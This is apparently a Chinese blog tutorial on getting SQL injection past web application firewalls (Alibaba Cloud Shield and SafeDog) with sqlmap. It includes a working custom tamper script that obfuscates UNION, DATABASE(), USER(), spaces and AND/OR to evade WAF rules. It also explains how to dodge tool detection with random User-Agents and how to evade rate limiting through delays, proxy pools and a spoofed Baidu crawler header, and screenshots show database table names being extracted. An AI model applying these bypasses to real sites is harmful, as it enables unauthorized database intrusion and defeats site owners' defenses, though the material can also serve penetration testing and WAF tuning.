WEB漏洞-SQL注入-利用SQLMAP工具绕过WAF

柔情只为你懂 2023-09-23 22:53 122阅读 0赞

1.  访问使用阿里云搭建的网站（存在自带的阿里云盾）。

1.  可以看到此时网站可以正常访问，可以进行正常注入。

![23157c372ef04dfb9636908d0aad5eb6.png][]

1.  使用工具进行注入。

![b2145589106a413dabb9af878e39d872.png][]

1.  可以看到在使用工具注入没多久后便返回了不存在注入点的信息。

![d25f380b2ed44d148e7be4a99b0673db.png][]

1.  因为经常会用到SQLMAP这款工具对注入点进行检测，在遇到WAF时，如果还想继续使用此工具，该怎么办呢？

1.  此时我们就要用到SQLMAP的名为“tamper”（自带绕过脚本）的插件库了。

![12e0addf896140eebe228f1d1baa0816.png][]

1.  但是这些默认的脚本必然是不能绕过我们现在常见的一些WAF的（可以绕过一些比赛的拦截规则，如CTF比赛等）。

1.  因此就需要我们自己来写脚本，在自己写脚本的过程中可以参考“tamper”下的脚本，可以对里面的脚本进行修改。

1.  在tamper文件夹中创建rdog.py。

#!/usr/bin/env python
    
    """
    Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
    See the file 'LICENSE' for copying permission
    """
    
    import re
    
    from lib.core.data import kb
    from lib.core.enums import PRIORITY
    
    __priority__ = PRIORITY.NORMAL
    
    def dependencies():
        pass
    
    def tamper(payload, **kwargs):
    
        retVal = payload
    
        if payload:
            retVal = retVal.replace('UNION', 'uNiOn/*/%0a*a*/')
            retVal = retVal.replace('DATABASE()', 'dataBase/*!(*/)')
            retVal = retVal.replace('DATABASE()', 'dataBase%23a%0a')
            retVal = retVal.replace('USER()', 'usEr/*!(*/)')
            retVal = retVal.replace(' ', '/**/')
            retVal = retVal.replace(" ", '%23a%0a')
            retVal = retVal.replace('OR', '/*!14400Or*/')
            retVal = retVal.replace('AND', '/*!14400aNd*/')
    
        return retVal

1.  利用我们刚刚书写的脚本再次进行注入。

![0577a8b5513148b1914eb676ea85b449.png][]

1.  可以看到最后注入结果依然不成功。

1.  原因并不是脚本写的有问题，而是因为WAF上的一些设置。

1.  我们抓取SQLMAP在运行过程中的数据包来进行分析。

![3feea6827af146068ae913a4e8d2f57f.png][]

1.  可以看到数据包内的User-Agent中包含“sqlmap”字样。

![4b2bc28f8836476eb116444a1217ae55.png][]

1.  在防护日志中可以看到拦截的原因是HTTP头部字段包含sqlmap字样。

![e9bdb7936a45417c9b64167f3a6d720b.png][]

1.  在漏洞防护规则里可以看到包含一种名为“工具拦截”的检测类型，当其发现是使用sqlmap工具时，就会进行拦截。

![0b2609c473a241a886eb04993ad6f776.png][]

1.  当将User-Agent的值随便改为其它值时，可以看到网站可以正常进行访问。

![98910e7a4b5246c786852cf829cf1ffd.png][]

1.  此时可以在SQLMAP的命令里加入“--random-agent”参数，此参数的作用是使User-Agent后面的值按照其字典随机出现。

![9293f8e01cf642b181e0cac2016800ef.png][]

1.  此时再次抓取数据包进行分析，可以看到User-Agent的值已经被成功更改。

![c43cd106aa024b94a3460cac4fadd44d.png][]

1.  继续运行SQLMAP，可以看到检测出了注入点。

![6f2d95fe148d440bbc774091bfe8b069.png][]

1.  获取表名。

![e2f34e30cbe340f881cf5a380c24bcfc.png][]

1.  可以看到SQLMAP工具成功跑出了数据库的表名。

![e3f6d399895b4a6180123ff9614b16e9.png][]

1.  接下来再次提高难度。

1.  将安全狗的流量防护也打开。

1.  打开此防护后安全狗会对过快访问的ip进行拦截。

![c97d91720e8147e894900f7a4b4089b9.png][]

1.  将SQLMAP的缓存删除掉后，再次进行运行。（前面每次对此地址进行再次注入测试时，都先将缓存进行了删除，如果不进行删除，SQLMAP会无法成功进行注入）

![83342998c7d4472c8838953b23c9a9c7.png][]

1.  再次运行SQLMAP。

![9a9a1602ddc94ada87d89b9502f8db26.png][]

1.  可以看到SQLMAP运行到这时停止了。

![3b8c7dafc3db44e99dba57d0bc5013d0.png][]

1.  此时访问网站，可以发现已经被拒绝访问了。

![006ccf2091224d5c8347fe10f10e4a8d.png][]

1.  面对此种情况，有以下几种办法：

*  延迟（--delay）

*  代理池

*  白名单http头（搜索爬虫http指纹头）

1.  这里展示第三种办法（采用百度的指纹头）

![e39e4399d9f14981991de0fb797fc64c.png][]

1.  在SQLMAP运行了一段时间后再次对网站进行访问，可以发现网站依然可以正常打开。

![b93d0f3b64db40ca8caa10b8caa3bb5b.png][]

1.  这里展示第二种方法（间隔1秒的延迟注入）。

![9232f72d7ed5483a9bb838dab0d09b6f.png][]

[23157c372ef04dfb9636908d0aad5eb6.png]: https://img-blog.csdnimg.cn/img_convert/23157c372ef04dfb9636908d0aad5eb6.png
[b2145589106a413dabb9af878e39d872.png]: https://img-blog.csdnimg.cn/img_convert/b2145589106a413dabb9af878e39d872.png
[d25f380b2ed44d148e7be4a99b0673db.png]: https://img-blog.csdnimg.cn/img_convert/d25f380b2ed44d148e7be4a99b0673db.png
[12e0addf896140eebe228f1d1baa0816.png]: https://img-blog.csdnimg.cn/img_convert/12e0addf896140eebe228f1d1baa0816.png
[0577a8b5513148b1914eb676ea85b449.png]: https://img-blog.csdnimg.cn/img_convert/0577a8b5513148b1914eb676ea85b449.png
[3feea6827af146068ae913a4e8d2f57f.png]: https://img-blog.csdnimg.cn/img_convert/3feea6827af146068ae913a4e8d2f57f.png
[4b2bc28f8836476eb116444a1217ae55.png]: https://img-blog.csdnimg.cn/img_convert/4b2bc28f8836476eb116444a1217ae55.png
[e9bdb7936a45417c9b64167f3a6d720b.png]: https://img-blog.csdnimg.cn/img_convert/e9bdb7936a45417c9b64167f3a6d720b.png
[0b2609c473a241a886eb04993ad6f776.png]: https://img-blog.csdnimg.cn/img_convert/0b2609c473a241a886eb04993ad6f776.png
[98910e7a4b5246c786852cf829cf1ffd.png]: https://img-blog.csdnimg.cn/img_convert/98910e7a4b5246c786852cf829cf1ffd.png
[9293f8e01cf642b181e0cac2016800ef.png]: https://img-blog.csdnimg.cn/img_convert/9293f8e01cf642b181e0cac2016800ef.png
[c43cd106aa024b94a3460cac4fadd44d.png]: https://img-blog.csdnimg.cn/img_convert/c43cd106aa024b94a3460cac4fadd44d.png
[6f2d95fe148d440bbc774091bfe8b069.png]: https://img-blog.csdnimg.cn/img_convert/6f2d95fe148d440bbc774091bfe8b069.png
[e2f34e30cbe340f881cf5a380c24bcfc.png]: https://img-blog.csdnimg.cn/img_convert/e2f34e30cbe340f881cf5a380c24bcfc.png
[e3f6d399895b4a6180123ff9614b16e9.png]: https://img-blog.csdnimg.cn/img_convert/e3f6d399895b4a6180123ff9614b16e9.png
[c97d91720e8147e894900f7a4b4089b9.png]: https://img-blog.csdnimg.cn/img_convert/c97d91720e8147e894900f7a4b4089b9.png
[83342998c7d4472c8838953b23c9a9c7.png]: https://img-blog.csdnimg.cn/img_convert/83342998c7d4472c8838953b23c9a9c7.png
[9a9a1602ddc94ada87d89b9502f8db26.png]: https://img-blog.csdnimg.cn/img_convert/9a9a1602ddc94ada87d89b9502f8db26.png
[3b8c7dafc3db44e99dba57d0bc5013d0.png]: https://img-blog.csdnimg.cn/img_convert/3b8c7dafc3db44e99dba57d0bc5013d0.png
[006ccf2091224d5c8347fe10f10e4a8d.png]: https://img-blog.csdnimg.cn/img_convert/006ccf2091224d5c8347fe10f10e4a8d.png
[e39e4399d9f14981991de0fb797fc64c.png]: https://img-blog.csdnimg.cn/img_convert/e39e4399d9f14981991de0fb797fc64c.png
[b93d0f3b64db40ca8caa10b8caa3bb5b.png]: https://img-blog.csdnimg.cn/img_convert/b93d0f3b64db40ca8caa10b8caa3bb5b.png
[9232f72d7ed5483a9bb838dab0d09b6f.png]: https://img-blog.csdnimg.cn/img_convert/9232f72d7ed5483a9bb838dab0d09b6f.png